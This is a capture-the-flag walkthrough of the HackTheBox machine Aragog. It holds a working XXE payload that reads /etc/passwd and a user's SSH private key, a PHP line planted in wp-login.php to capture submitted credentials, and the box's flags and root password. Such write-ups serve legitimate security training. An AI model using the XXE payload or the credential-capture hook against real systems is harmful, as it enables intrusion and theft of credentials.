Aragog HackTheBox Notes

nmap -sV -T5 10.10.10.78

PORT   STATE SERVICE VERSION

21/tcp open  ftp vsftpd 3.0.3

22/tcp open  ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

80/tcp open  http Apache httpd 2.4.18 ((Ubuntu))

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

 

Running dirbuster with medium wordlist

 

10.10.10.78/hosts.php => "There are 4294967294 possible hosts for"
4294967294 is 2^32 - 2, i.e. the usable host count of a /0 (netmask 0.0.0.0). So hosts.php computes a host count from a subnet mask it is given, which means it takes input.

 

Possible Apache vulnerability

In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, use of the ap_get_basic_auth_pw() by third-party modules outside of the authentication phase may lead to authentication requirements being bypassed.

 

OpenSSH CVE details

https://www.cvedetails.com/vulnerability-list/vendor_id-97/product_id-585/version_id-194112/Openbsd-Openssh-7.2.html

 

Attempting to SSH in shows that only public-key authentication is accepted:

root@10.10.10.78: Permission denied (publickey).

 

Dirbuster found a /server-status/ directory, so there may be something in there.

Nothing further was found with the php, xml and txt extensions.

 

The headers for index.html show

an ETag value of "2c39-560a6a98ed804-gzip". A request that sends this value back in an If-None-Match header gets a 304 Not Modified (not an error) instead of the body, as long as the resource's ETag still matches.

 

Connecting to the FTP server as anonymous, there is a file "test.txt".

Using "get test.txt -" (a local filename of "-" writes to stdout) we can see the contents:

<details>

<subnet_mask>255.255.255.192</subnet_mask>

<test></test>

</details>

This is XML. It is a hint to try an XML External Entity (XXE) attack, which is on the 2017 OWASP Top 10 list (A4:2017). XXE exploits weakly configured XML parsers (ones that resolve external entities) to read files from the server. For it to work here we must pay attention to the element names in the file (details, subnet_mask, test), because the server only echoes back the content of the element it actually uses.

 

You can test whether the site is likely to be vulnerable to XXE by pointing the external entity at /dev/random instead of a real file. A parser that resolves external entities will block reading the endless device, so if the request hangs (times out) that is a good indicator that entities are being resolved.

 

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [ <!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<details>

<subnet_mask>&xxe;</subnet_mask>

</details>

 

This will get us the /etc/passwd file so we can discover the users on the system. We have learned so far that we require a key in order to get a shell via SSH, so let's look for any keys belonging to the users found. The first user that stood out was florian, the one with a home directory under /home.

 

Replacing /etc/passwd with /home/florian/.ssh/id_rsa will reveal florian's private key. Save it locally with 0600 permissions and use it (ssh -i id_rsa florian@10.10.10.78) to obtain a shell on the box.

 

User.txt = f43bdfbcfd3f2a955a7b67c7a6e21359

 

Discovered user “cliff”

 

Using pspy I noticed commands running on a schedule: every minute the following would run.

 

2018/07/13 08:37:01 CMD: UID=1001 PID=114159 | /usr/bin/python /home/cliff/wp-login.py

2018/07/13 08:37:01 CMD: UID=1001 PID=114158 | /bin/sh -c /usr/bin/python /home/cliff/wp-login.py

2018/07/13 08:37:01 CMD: UID=0 PID=114157 | /usr/sbin/CRON -f

2018/07/13 08:37:01 CMD: UID=1001 PID=114160 | /usr/bin/python /home/cliff/wp-login.py

2018/07/13 08:37:01 CMD: UID=1001 PID=114162 | /usr/bin/python /home/cliff/wp-login.py

 

We can see the wp-login.py script being run as UID 1001 (cliff) from root's cron. Let's assume that this script is posting valid credentials to the wp-login.php file, which we are able to modify.

 

Adding the following line to wp-login.php, we can capture the raw POST body (and with it the submitted values):

file_put_contents('/tmp/test.txt', file_get_contents('php://input')); // dump the raw POST body to /tmp

Note that each run overwrites /tmp/test.txt; pass FILE_APPEND as the third argument to file_put_contents if you want to keep every capture.

 

Results:

pwd=%21KRgYs%28JFO%21%26MTr%29lf&wp-submit=Log+In&testcookie=1&log=Administrator&redirect_to=http%3A%2F%2F127.0.0.1%2Fdev_wiki%2Fwp-admin%2

 

The values are URL-encoded; decoding pwd gives !KRgYs(JFO!&MTr)lf, which is also root's password, so su root works with it.

 

Root.txt = 9a9da52d7aad358699a96a5754595de6
